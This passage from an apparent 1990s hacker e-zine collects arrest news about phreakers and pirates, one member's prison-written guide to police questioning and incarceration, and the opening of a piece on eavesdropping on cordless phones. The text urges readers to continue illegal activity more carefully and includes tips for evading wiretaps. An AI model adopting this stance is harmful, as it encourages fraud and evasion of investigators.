them 'no, you can't search my car', yet minutes later, he noticed
|
|||
|
an officer going through the contents of his car. Despite his protests,
|
|||
|
the officer removed several timing crystals, tone dialers, and a 'broken
|
|||
|
red box'.
|
|||
|
The following day, Bernie was at a friend's house when '8 to 10' plain
|
|||
|
clothed armed men burst into the house yelling 'freeze'. Minutes later
|
|||
|
he was being taken to jail in cuffs. He was not formally charged until
|
|||
|
his arraignment where his bail was set to 100,000 dollars because he
|
|||
|
refused to talk with the police without counsel present.
|
|||
|
"The Judge dropped the two unlawful use of a computer charges due to
|
|||
|
the fact that the evidence was circumstantial and the county had no actual
|
|||
|
evidence that Ed had ever used the computers in question. As of 3/27/1995
|
|||
|
Ed Cummings is still in Delaware County Prison awaiting his trial."
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"RUSSIANS ARREST 6 IN COMPUTER THEFTS"
|
|||
|
|
|||
|
This article was taken from the Associated Press, Saturday Dec 24 1994
|
|||
|
|
|||
|
St. Petersburg, Russia, Sept 26 (AP) -- Russian police
|
|||
|
officers have arrested six more people in a $10 million
|
|||
|
computer theft from Citibank here, but the masterminds are
|
|||
|
said to remain at large.
|
|||
|
|
|||
|
Several people have been arrested abroad and face charges
|
|||
|
in the United States, including Vladimir Levin, 28,
|
|||
|
reportedly the group's computer hacker.
|
|||
|
|
|||
|
Citibank officials said they recovered all but $400,000 and
|
|||
|
upgraded the cash-management systems's electronic security
|
|||
|
after the theft.
|
|||
|
|
|||
|
|
|||
|
FT, Sept 21, 1995.
|
|||
|
|
|||
|
Extradition in Citibank hacking case
|
|||
|
|
|||
|
A British court yesterday approved the extradition to the
|
|||
|
US of Mr Vladimir Levin, the Russian science graduate
|
|||
|
accused of an attempted $10m (6.5m pounds) computer hacking
|
|||
|
fraud on Citibank. ...
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"PURPLE CONDOM CAUSES TROUBLE"
|
|||
|
|
|||
|
Purpcon recently had pleasant meetings with his Dean where he attends
|
|||
|
college after getting caught rewriting his magnetic student ID, so
|
|||
|
that others would get charged for his meal. :)
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"CoTNo RUMORS"
|
|||
|
|
|||
|
In past issues of CoTNo we have always said 'good luck to' people
|
|||
|
that have been busted (or said to have been busted)..
|
|||
|
|
|||
|
Deathstar, AntiChrist (school admins?), Coaxial Mayhem,
|
|||
|
Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
|
|||
|
Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
|
|||
|
CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
|
|||
|
|
|||
|
At the request of some of the above, I can't go into details on their busts.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"JOHN FALCON BUSTS"
|
|||
|
|
|||
|
Since rumors about his bust have been running rampant on the 'Net',
|
|||
|
here are the facts about the bust... for more info, and JF's reply
|
|||
|
to the rumors, read CoTNo 5.
|
|||
|
|
|||
|
Common myths of my arrest:
|
|||
|
|
|||
|
1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
|
|||
|
2 - Mr. Falcon left his secring.pgp on his system.
|
|||
|
3 - FBI/NSA read the RSA encrypted data.
|
|||
|
4 - My conviction was because I was a hacker.
|
|||
|
|
|||
|
Let me go over my conviction:
|
|||
|
|
|||
|
Count 1: Theft of Government Property - How they caught me: Narc
|
|||
|
Count 2: Fraudulent use of an Access Device - How they caught me: Narc
|
|||
|
Count 3: Fraudulent use of a Computer - How they caught me: questionable
|
|||
|
Count 4: Fraudulent use of an Access Device - How they caught me: Narc
|
|||
|
|
|||
|
If you would like to get in contact with JF, here is his info:
|
|||
|
email: jfalcon@ice_bbs.alaska.net
|
|||
|
snailmail: Don Fanning
|
|||
|
#12617-006
|
|||
|
3600 Guard Road
|
|||
|
Lompoc, CA 93436
|
|||
|
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"EPSILON, DAMIEN, SHOCKWAVE (303)"
|
|||
|
|
|||
|
From CoTNo 3 (Read there for full story)
|
|||
|
|
|||
|
Three Colorado teen-agers are suspected of setting up an elaborate computer-
|
|||
|
hacking system that tapped into a long-distance telephone company and stole
|
|||
|
secret access codes (k0dez!).
|
|||
|
|
|||
|
Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
|
|||
|
Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
|
|||
|
County in the alleged scheme.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"INTERVIEW WITH A CRYPTKEEPER"
|
|||
|
|
|||
|
ck: I only got busted last February (1994) for hacking
|
|||
|
|
|||
|
dis: I heard you got hit twice.. once last year, and once a lot more
|
|||
|
+recently..
|
|||
|
|
|||
|
CK: nope, I moved, I didn't get busted. I only got busted last year,
|
|||
|
once, that's it. And it wasn't real serious.. not like cellphone/money
|
|||
|
laundering..just some inet hacking. I got busted for hacking the
|
|||
|
University of Cincinnati and a few other things on the net.. they
|
|||
|
traced me through a PBX.. they were serious. They thought I was
|
|||
|
a spy. they were pissed to find out I was just a 16 year old.
|
|||
|
|
|||
|
dis: hmm... bad.. did they just search/seize or what?
|
|||
|
|
|||
|
ck: search/seized my computer.. I eventually got most of my stuff back
|
|||
|
(the computer, monitor, and keyboard) and had to spend 10 days in
|
|||
|
juvenile thats about it. oh.. and a big pain in the ass too of
|
|||
|
course not bad at all..
|
|||
|
|
|||
|
dis: anything else?
|
|||
|
|
|||
|
ck: and tell them I was only busted ONCE, and it wasn't all that serious.
|
|||
|
I don't have any plans to get back into the scene (it sux now), but
|
|||
|
I do enjoy hearing about it sometimes.
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"FEDZ CATCHING ON TO CALLING CARD SKAMS"
|
|||
|
|
|||
|
A $50 million telephone calling-card theft ring disclosed
|
|||
|
earlier this week by federal investigators is representative of the advanced
|
|||
|
types of scams that have emerged in the last two years as telephone companies
|
|||
|
have become better at ferreting out fraud.
|
|||
|
|
|||
|
The Secret Service said Ivy James Lay, a switch engineer at MCI's network
|
|||
|
center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
|
|||
|
and other long distance companies, later selling them to 'band of computer
|
|||
|
hackers.' The estimated value of the cards lies near $50 million. The
|
|||
|
Secret Service (which investigates fraud like this) claims this to be the
|
|||
|
largest case of calling card theft to date.
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
|
|||
|
|
|||
|
Two computer hackers have been sentenced to fed. prison and an accomplice in
|
|||
|
Mn. awaits sentencing for his part in an international phone conspiracy.
|
|||
|
Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C.,
|
|||
|
were part of a hacker ring that stole credit-card numbers from MCI's
|
|||
|
Computer terminal in Greensboro. A third member of the ring, Leroy James
|
|||
|
Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
|
|||
|
copyright violations.
|
|||
|
|
|||
|
US District Court Judge James Beaty on Fri. sentenced Lay to tree years
|
|||
|
and two months in prison. Stanton, a 22-year-old student at Wingate College,
|
|||
|
was sentenced to one year. Anderson's sentencing is expected this summer.
|
|||
|
|
|||
|
The conspiracy stretched into several European countries and cost long-
|
|||
|
distance carriers more than $28 millon, authorities said.
|
|||
|
|
|||
|
Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
|
|||
|
in unauthorized access devices. The group bought and sold at least 50,000
|
|||
|
numbers from 1992 until the summer of 1994, according to court documents.
|
|||
|
|
|||
|
"What I did was very stupid," Stanton told Judge Beaty at his sentencing.
|
|||
|
"I'd like to go back and finish college."
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"SHOCKER[303] GETS NAILED FOR CC'S"
|
|||
|
|
|||
|
Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
|
|||
|
bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
|
|||
|
listened to you. Fuck me. Got my mac taken away, I am writing this from a
|
|||
|
friends, I am not supposed to be here either, but hell, I got everything taken
|
|||
|
away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
|
|||
|
happens, I'll call you sometime if I can get to the phone w/out my parents
|
|||
|
knowing. I can't have anything back until I pay for this shit, I think it is
|
|||
|
between $400 and $500, not sure, I already paid $170, but then I hafta
|
|||
|
fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
|
|||
|
got like, a felony and a second degree misdemeanor for that shit, they
|
|||
|
will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
|
|||
|
and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
|
|||
|
see ya ok? Bye..
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"NYHE RUMORS"
|
|||
|
|
|||
|
The New York Hack Exchange got busted for scams and cellfonez...
|
|||
|
|
|||
|
(Someone mail me with more than a rumor please)
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"WAREZ BOARD BUSTS AROUND THE COUNTRY"
|
|||
|
|
|||
|
Bad Sector [BUSTED!]
|
|||
|
Beyond Corruption [BUSTED!]
|
|||
|
Jurrasic Park [BUSTED!]
|
|||
|
Lineup [BUSTED!]
|
|||
|
Main Frame [BUSTED!]
|
|||
|
Necronomicon [BUSTED!]
|
|||
|
No BBS [BUSTED!]
|
|||
|
The Notice [BUSTED!]
|
|||
|
On The World [BUSTED!]
|
|||
|
Perfect Crime [BUSTED!]
|
|||
|
Red Alert [BUSTED!]
|
|||
|
Restricted Area [BUSTED!]
|
|||
|
Rubbish Heap [BUSTED!]
|
|||
|
Skull Island [BUSTED!]
|
|||
|
Twins [BUSTED!]
|
|||
|
The Underworld [BUSTED!]
|
|||
|
Wolf Pack [BUSTED!]
|
|||
|
|
|||
|
15 Arrests
|
|||
|
75 RCMP Officers Involved
|
|||
|
Removed at least 11 BBSs in one day
|
|||
|
Seized more than $200,000 in computer hardware
|
|||
|
Operation/Investigation lasted 6 months to 1 year
|
|||
|
April 12, 1995
|
|||
|
Busts are localized in Montreal
|
|||
|
514 NPA
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"DUTCH HACKER ARRESTED"
|
|||
|
|
|||
|
(from CUD 7.21):
|
|||
|
|
|||
|
--------------Original message----------------
|
|||
|
|
|||
|
UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
|
|||
|
become the first person to be convicted of computer hacking in the
|
|||
|
Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
|
|||
|
student, was handed down a six month suspended sentence by
|
|||
|
magistrates last week, and was fined around $3,200
|
|||
|
|
|||
|
Oosteveen was accused of breaking into university, corporate and
|
|||
|
government computers, following his arrested in March, 1993, just
|
|||
|
three weeks after new Dutch anti-hacking legislation came into force.
|
|||
|
|
|||
|
Oosteveen was caught in the act of trying to hack into the computer
|
|||
|
lines of a technical university in Delft near The Hague. He is also
|
|||
|
thought to have been responsible for previous hacking attacks which
|
|||
|
occurred before the new legislation came into force.
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"THE EAST COAST"
|
|||
|
|
|||
|
Tabas and Others Bust:
|
|||
|
|
|||
|
According to Gatsby, the following were busted: Himself, Mark Tabas
|
|||
|
KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
|
|||
|
|
|||
|
(When I talked to him, he wasn't able to say much since it was the day
|
|||
|
after the bust)
|
|||
|
|
|||
|
From empire Times:
|
|||
|
February 22, 1995
|
|||
|
|
|||
|
One thing all the people have in common: Southwestern Bell - or at the very
|
|||
|
least, the desire and ability to hack all the switches on the west coast.
|
|||
|
|
|||
|
According to those involved, it goes way beyond switches...
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"THE LAMACCHIA CASE"
|
|||
|
|
|||
|
April 94:
|
|||
|
|
|||
|
BOSTON, MA ...A federal grand jury returned a felony indictment today
|
|||
|
charging an MIT student in a computer fraud scheme resulting in the piracy of
|
|||
|
an estimated million dollars in business and entertainment computer software.
|
|||
|
|
|||
|
United States Attorney Donald K. Stern and FBI Special Agent In
|
|||
|
Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
|
|||
|
currently a junior at the Massachusetts Institute of Technology, was charged
|
|||
|
in a one count felony indictment with conspiring to commit wire fraud. The
|
|||
|
indictment charges that between November 21, 1993 and January 5, 1994
|
|||
|
LAMACCHIA operated a computer bulletin board service that permitted users
|
|||
|
to copy copyrighted business and entertainment software without paying to
|
|||
|
purchase the software. The bulletin board was operated without authorization
|
|||
|
on MIT computer work stations and was accessible to users worldwide over the
|
|||
|
Internet... [Losses] are estimated to exceed a million dollars. [bahaha]
|
|||
|
|
|||
|
=-=-=
|
|||
|
|
|||
|
"BRITISH CALLING CARD BUST"
|
|||
|
|
|||
|
British students have taken part in an alleged <20>65m computer fraud,
|
|||
|
involving the electronic theft of cards that allow users to make free
|
|||
|
telephone calls around the world.
|
|||
|
|
|||
|
The hackers, one of whom was only 17 years old, were said to be earning
|
|||
|
thousands of pounds a month selling cards... Police found one teenager
|
|||
|
driving a new <20>20,000 car and with computer equipment worth <20>29,000 in his
|
|||
|
bedroom.
|
|||
|
|
|||
|
AT&T officials also found a computer noticeboard called "Living Chaos"
|
|||
|
that was being used to sell the cards for up to <20>30 each. It mentioned
|
|||
|
Andy Gaspard, an employee of the Cleartel telephone company in
|
|||
|
Washington, whose home was raided. "We found 61,500 stolen cards ready
|
|||
|
to be sent to Britain," said Eric Watley, a secret service agent in the city.
|
|||
|
|
|||
|
(The Sunday Times, 12 February 1995)
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
"TNO BUST OF 1994 - NEW NEWS"
|
|||
|
|
|||
|
(my comments in [ ])
|
|||
|
|
|||
|
ROCKY MOUNTAIN NEWS
|
|||
|
(Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
|
|||
|
Quartet accused of hacking into Arapahoe college's system,
|
|||
|
inciting illegal acts.
|
|||
|
|
|||
|
---------------------------------------------------------------------------
|
|||
|
(Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
|
|||
|
Suspects used equipment at college to incite criminal acts, officials say.
|
|||
|
|
|||
|
Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!]
|
|||
|
allegedly gained access to the Arapahoe Community College computer and
|
|||
|
used it to distribute tips on how to commit crimes.
|
|||
|
One man operated a computer bulletin board on which contributors
|
|||
|
from throughout the world exchanged how-to information on crimes ranging
|
|||
|
from credit-card fraud to high-tech burglary, authorities said. [Of course
|
|||
|
they fail to make that distinguishing gap that this board was NOT run off
|
|||
|
the Arapahoe system, and that it was a private BBS run out of his house]
|
|||
|
Computers were seized from the homes of four hackers, ranging in
|
|||
|
age from 15 to 21. Secret Service experts were called in to help crack
|
|||
|
the computer files. ['type filename.txt' is hard to crack eh?]
|
|||
|
Investigators found software for breaking passwords, lists of
|
|||
|
private passwords for several computer systems, instructions for cellular
|
|||
|
telephone fraud, private credit reports [Plural? Nope], lists of credit-card
|
|||
|
numbers and electronic manuals on how to make bombs and illegal drugs.
|
|||
|
[Yes, WE did the oklahoma bombing!@$!]
|
|||
|
In a 97-page affidavit detailing the 18-month investigation,
|
|||
|
investigator John Davis of the Arapahoe district attorney's office said
|
|||
|
that the hackers "operate with an attitude of indifference to the rights
|
|||
|
and privacy of others and have made efforts to teach and involve others in
|
|||
|
their criminal enterprise." [What the fuck does the government do everyday?]
|
|||
|
At the home of a Denver juvenile, authorities found hazardous
|
|||
|
chemicals and a book on how to make bombs.
|
|||
|
Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
|
|||
|
of Thornton, were charged last month with committing computer crimes and
|
|||
|
conspiracy. Both are scheduled to appear in Arapahoe County Court on July
|
|||
|
5.
|
|||
|
A decision is pending on whether to charge a 15-year-old Highlands
|
|||
|
Ranch youth and a 17-year-old Denver resident, chief deputy district
|
|||
|
attorney John Jordan said Friday.
|
|||
|
The affidavit says Papadenis, Jackson, and the youths hacked into
|
|||
|
the Arapahoe County Community College computer system, then used it to
|
|||
|
illegally distribute copyrighted computer games [Sorry, TNo doesn't have
|
|||
|
a warez division yet] and electronic magazines promoting fraud, theft,
|
|||
|
burglary and money-laundering.
|
|||
|
One of the magazines stated, "This publication contains information
|
|||
|
pertaining to illegal acts. The use of this information is intended solely
|
|||
|
for evil purposes." [Source: CoTNo 1!@#!@]
|
|||
|
Court documents do not indicate the hackers had political motives,
|
|||
|
and authorities declined to comment on the case. [Hackers with political
|
|||
|
motives would be way above their head.]
|
|||
|
A Denver University expert said computer criminals usually are not
|
|||
|
motivated by ideology. They usually are young people who are "doing it for
|
|||
|
the sheer challenge of it - just to demonstrate that they're able to do it,"
|
|||
|
said Don McCubbery, director for the center on electronic commerce at DU.
|
|||
|
McCubbery estimates that authorities learn of only 5% of computer
|
|||
|
crimes. He said computer security experts generally have difficulty
|
|||
|
keeping up with the hackers. [No shit]
|
|||
|
|
|||
|
-----------------------------------------------
|
|||
|
(Side note box) THE NEW ORDER (Bullet listing)
|
|||
|
|
|||
|
Some accusations listed in court documents concerning The New Order group
|
|||
|
of computer hackers:
|
|||
|
- A hacker from the United Kingdom offered suspect John Jackson
|
|||
|
a VISA card number with a $300,000 credit limit. [Tacos anyone?]
|
|||
|
- A computer seized from a Highlands Ranch home contained password
|
|||
|
files for computer systems at the University of Colorado
|
|||
|
at Boulder.
|
|||
|
- A note found in Jackson's home indicated his plans to hack into
|
|||
|
the Thornton Police Department computer. [Yes, they believe
|
|||
|
everything they read]
|
|||
|
- Jackson also had a computer file containing access information
|
|||
|
for Taco Bell and McDonald's computers. [There goes national
|
|||
|
security!]
|
|||
|
|
|||
|
=-=
|
|||
|
|
|||
|
That is all for now. Not a good year by any means as you can tell,
|
|||
|
especially considering who else may have been busted, that we didn't hear
|
|||
|
about. Don't stop what you are doing though, just be more careful of
|
|||
|
your activities. YOU are right, THEY are wrong.
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
What Happens When You Get Caught
|
|||
|
--------------------------------
|
|||
|
[A.K.A The Hackers Guide to the Law and Prisons]
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
D. Fanning - A.K.A. John Falcon/Renegade - TNO
|
|||
|
|
|||
|
|
|||
|
Well if you are reading this, that means you are either curious or shit
|
|||
|
happened and the law reared it's ugly head and they nabbed you. Now what
|
|||
|
you are about to read is absolutely fucking true. Why is this? Because I
|
|||
|
am spending the next year or so in prison for hacking. Now needless to
|
|||
|
say, I have already announced my retirement from the scene, but I still
|
|||
|
wanted to write and rant and rave about all the things that happen in this
|
|||
|
world and to clue you in on a quite a few things.
|
|||
|
|
|||
|
Let's start with the ground rules:
|
|||
|
|
|||
|
1. You cannot make a deal with a cop. So when they start reading Miranda
|
|||
|
rights, keep silent or just ask inconspicuous questions like "Where are we
|
|||
|
going?", or the common ne, "What's going on here? Why am I being charged?"
|
|||
|
|
|||
|
Only a D.A. or someone in the lawyer capacity can make a deal. If a
|
|||
|
cop offers a deal, you are still going to get charged. Cops cannot
|
|||
|
make any exceptions on anyone. So drop all ideas of such.
|
|||
|
|
|||
|
2. Do not narc on anyone when the questioning starts. Your best bet would
|
|||
|
be to just stay silent till the lawyer shows up or something. Why?
|
|||
|
Questioning wouldn't be done unless there were gaps in their
|
|||
|
investigation. What you want is as many of those as possible. The
|
|||
|
more you have, the better it will be when plea bargaining starts up.
|
|||
|
At the very least though, lets say the they do convict you, the feds
|
|||
|
and the court find you guilty or you plea that way and you are thrown
|
|||
|
into the clink. Guess who does your admissions paperwork? You guessed
|
|||
|
it, the inmates. Word has a way of coming around to dealing or giving
|
|||
|
a very wide berth to those who do the narc thing Key idea: "If you
|
|||
|
fall, don't bring others down too. It just adds to the load on you."
|
|||
|
|
|||
|
3. During questioning, they will put on a lot of plays to make you talk,
|
|||
|
they will offer you something to drink or something to make you feel
|
|||
|
more comfortable. Well why not? Spend 60 cents and get your work done
|
|||
|
for you by a confession. Makes things nice and neat. Don't fall for
|
|||
|
it. If you are thirsty, accept the drink and don't tell them shit.
|
|||
|
|
|||
|
4. They will also do some kind of powerplay on you. They try to make you
|
|||
|
think that they are doing you a favor, but in reality, you are digging
|
|||
|
a deeper hole for yourself.
|
|||
|
|
|||
|
5. The idea of you being innocent until proven guilty has gone the way of
|
|||
|
the do-do bird. When a jury sees you, the first thought that comes to
|
|||
|
mind is not if you are guilty or not, the question is HOW guilty you
|
|||
|
are. The way they see it, if you are not guilty, what are you doing
|
|||
|
in front of them in the first place? The O.J. Simpson trial is a
|
|||
|
perfect example. Also, look how many cop shows are around the box.
|
|||
|
That right there is a disgrace in my book. First they have you on
|
|||
|
film, second they pat each other on the back while you are in
|
|||
|
misery. Sick.
|
|||
|
|
|||
|
Well on with the show. If they have already done an investigation on you
|
|||
|
and you don't hear from them in a while, the first natural reaction would
|
|||
|
be to relax and let your guard down. WRONG ANSWER! That means that some
|
|||
|
shit is really going to go down. You should be extra careful and not
|
|||
|
talk about it to anyone. Most likely they are looking for more evidence
|
|||
|
to make it harder on you in the long run, like a wiretap. In the federal
|
|||
|
system, all you need is one person's permission to record a phone call.
|
|||
|
If you have to talk about it, use face to face contact and pat each other
|
|||
|
down to make sure there is no bug. For instance, when I was arrested I made
|
|||
|
a fatal mistake and talked about it to one of the co-defendants and he
|
|||
|
had cut a deal with the D.A. already. My bacon was cooked when I heard
|
|||
|
my voice on a tape recording.
|
|||
|
|
|||
|
Well no matter what happens, sooner or later you will get nabbed so I won't
|
|||
|
get into the details of this. All I can suggest is that you really do
|
|||
|
what ever you can to get a real attorney. P.D.'s are good for some
|
|||
|
things but they get their paycheck from the same place that nabbed you in
|
|||
|
the first place so don't let that fool you too much. I will admit that
|
|||
|
it is better than nothing though.
|
|||
|
|
|||
|
Most likely for the computer hackers out there, they will charge you
|
|||
|
under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access
|
|||
|
Device. This charge was mainly intended for credit cards but the D.A.'s
|
|||
|
have taken it to just about everything that involves computers or
|
|||
|
communications in general.
|
|||
|
|
|||
|
Now there are some landmark cases that have beat this into the ground.
|
|||
|
One of them being U.S. vs Brady which was a guy making satellite decoders
|
|||
|
with the stops pulled out of them. He beat this due to the ruling that
|
|||
|
the signal was out there everywhere and that he merely just decoded the
|
|||
|
signal. Therefore there was no actual loss, just potential loss which
|
|||
|
doesn't count. Another one is U.S. vs McNutt in the 10th Circuit of
|
|||
|
Utah. This guy made chips for cellular phones that would send different
|
|||
|
ESN/MIN pairs to the cell site that made it always seem like a new roamer
|
|||
|
every time he calls. The cell site just goes ahead and gives him the call
|
|||
|
because it doesn't have time to verify if it is a valid MIN/ESN pair. He
|
|||
|
won the case due to the same fact that there were no accountable loss
|
|||
|
because it never used or really billed any legit customer.
|
|||
|
|
|||
|
The flip side of that is being two weeks ago from when this was written,
|
|||
|
a guy was tried in LA for the exact same thing and was found guilty,
|
|||
|
appealed the case, won the appeal, then the government re-appealed it and
|
|||
|
he lost again. This caused a split in the court circuits which means
|
|||
|
that this will got the Supreme Court.
|
|||
|
|
|||
|
Remember that the government or any government agency will not press any
|
|||
|
issue unless there is some kind of financial deal behind it because they
|
|||
|
are wasting time and resources on you when they can be getting Joe Blow
|
|||
|
Cartel Drug Dealer.
|
|||
|
|
|||
|
So they find you guilty or you plea. The next step is the Pre-Sentence
|
|||
|
Investigation. They basically take a fine tooth comb and find any dirt
|
|||
|
about you that they can. You will be amazed about all the things they
|
|||
|
can do to make you seem like a threat to society, the American way of
|
|||
|
life, apple pie and all... All you can do is make sure or try your
|
|||
|
hardest to make it clean as possible. Now I got ripped hard on mine due
|
|||
|
to very strained relations with one of my parents and they managed to
|
|||
|
throw everything that anyone had ever said about me together to make it
|
|||
|
look like I was truly evil. That is where the cops will come back and
|
|||
|
haunt you because everything you say will be in that report. Every
|
|||
|
little action and all will be written with a slant of a cop. (Needless to
|
|||
|
say who writes the report kids... The U.S. Probation Office, a branch of
|
|||
|
the Secret Service and the F.B.I.)
|
|||
|
|
|||
|
Well you are convicted and here you are. Depending on where you live,
|
|||
|
you will either be bussed/vanned to the prison where they choose for
|
|||
|
you or they will fly you there. After you are sentenced you now belong
|
|||
|
to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken
|
|||
|
to a county jail for holding while they classify you and then you get
|
|||
|
transported out. When I was transported out, I was in shackles and all
|
|||
|
taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated
|
|||
|
from drug busts and converted them into their own use. You are basically
|
|||
|
bussed out to a unused or empty part of the airport and with a large ring of
|
|||
|
USM's with shotguns in their hand, you get put onto an airplane and given a
|
|||
|
box lunch and off you go. I went from Portland to Sacramento to Phoenix
|
|||
|
in one day. Spent the night at the FCI in Phoenix then the next morning
|
|||
|
from there to Lompoc where I am now.
|
|||
|
|
|||
|
Remember these words though... You are now property of the B.O.P. Basically
|
|||
|
you are luggage, they can transport you at any time whenever they want to.
|
|||
|
But, depending on where you go, it isn't all that bad. Most likely you will
|
|||
|
meet friends or acquaintances that will help you along. Just ask a few
|
|||
|
questions and usually they will know. One thing to never do is be secretive
|
|||
|
about why you are there. You are there, most likely someone else is there
|
|||
|
for the same thing and you can get a strong fellowship going with people
|
|||
|
in the same predicament.
|
|||
|
|
|||
|
One thing to always keep in mind from now to eternity, no matter where you go.
|
|||
|
The feds are nailing everyone for 'Conspiracy'. It's a damn shame when
|
|||
|
you go to a place where 90 percent of the inmate population is here on some
|
|||
|
kind of drug related charge and of that 90%, 35% are here on conspiracy
|
|||
|
related charges. Truly something to think about.
|
|||
|
|
|||
|
Now for the hackers and phreakers that are facing jail. If your PSI report
|
|||
|
even breaths any mention of some kind of use with the computer, you will be
|
|||
|
banned from that. 3 days ago I was given a list of direct orders to avoid
|
|||
|
all contact of that. Likewise, they put a restriction on the levels of
|
|||
|
computer related material that I can read. Usually you can get any
|
|||
|
periodical you want except for things that deal with gay man on man stuff.
|
|||
|
Just like the gay people feel, that smells of discrimination but that's
|
|||
|
just the way it is.
|
|||
|
|
|||
|
Phones are something else that you will wish that changes real quick. The
|
|||
|
phones are run by a B.O.P. thing called ITS-Inmate Telephone Services.
|
|||
|
Basically it's a Unix run PBX that limits the people you can call and it
|
|||
|
throws the bill on you. No more collect calls or anything of that nature.
|
|||
|
Just doesn't happen. But the inmates have won a Class action suit against
|
|||
|
the B.O.P. about this and the government right now is appealing it.
|
|||
|
Technically with a suit or even an appeal, you have to implement it
|
|||
|
as soon as you can after the judgement is made. But it's been a year
|
|||
|
since they won it and nothing changes. Basically it's the government stalling.
|
|||
|
|
|||
|
Well that's all for me to say this time around. Remember to keep the dream
|
|||
|
alive and judge for yourself with that piece of gray matter between your
|
|||
|
ears.
|
|||
|
|
|||
|
You can write any comments to me at:
|
|||
|
Fanning
|
|||
|
Reg No. 12617-006
|
|||
|
3600 Guard Road
|
|||
|
Lompoc, CA 93436
|
|||
|
|
|||
|
or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
|
|||
|
(I prefer the first method to save my friends postage costs.)
|
|||
|
|
|||
|
Keep it strong - TNO (The New Order)
|
|||
|
|
|||
|
John Falcon - Ex-TNo
|
|||
|
1981-1994
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--- Legal and Technical Aspects of RF Monitoring ---
|
|||
|
|
|||
|
--- Major [TNo] ---
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYNOPSIS
|
|||
|
--------
|
|||
|
The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article
|
|||
|
doubtlessly sparked an interest in cordless phone monitoring. Wireless
|
|||
|
telephones are a prime target for monitoring. Both cordless and cellular
|
|||
|
telephones are nothing more than radio transceivers that, at some point,
|
|||
|
interface with the telephone system. This article will seek to expand on
|
|||
|
and clarify some points made in "Cordless Fun", and also to point to some
|
|||
|
other areas of interest.
|
|||
|
|
|||
|
=============================================================================
|
|||
|
|
|||
|
|
|||
|
CORDLESS
|
|||
|
--------
|
|||
|
Legal Stuff:
|
|||
|
Monitoring cordless phones is now a federal crime! Recent legislation
|
|||
|
prohibits listening in on cordless phones, much the same as cellular phones.
|
|||
|
Also, the Communications Act of 1934 makes it a crime to divulge
|
|||
|
anything you monitor to another person. It is also illegal to use anything
|
|||
|
that you hear for personal gain. Note that this applies to anything that you
|
|||
|
monitor, not just cordless phones. Alternatively, there are presently no
|
|||
|
restrictions on scanners that are capable of receiving cordless phone
|
|||
|
frequencies. However, I suspect that in the near future the feds will deny
|
|||
|
certification to such scanners, as they did with scanners that could receive
|
|||
|
cellular frequencies.
|
|||
|
|
|||
|
Technical Stuff:
|
|||
|
Cordless telephones transmit and receive with very low power. This is
|
|||
|
primarily to minimize interference with other nearby cordless telephones.
|
|||
|
This makes scanning for cordless telephones a short-range endeavor. Most
|
|||
|
cordless phones of recent manufacture operate in the 46-49MHz range.
|
|||
|
However, the FCC has recently opened up a part of the 900MHz spectrum for
|
|||
|
cordless telephone usage. The new 900MHz phones often offer greater range
|
|||
|
and increased clarity. There are also models sporting "spread-spectrum"
|
|||
|
technology, which makes monitoring with conventional scanning-receivers a
|
|||
|
virtual impossibility. Another security measure on some cordless phones
|
|||
|
involves encoding the DTMF tones sent from the handset to the base. This
|
|||
|
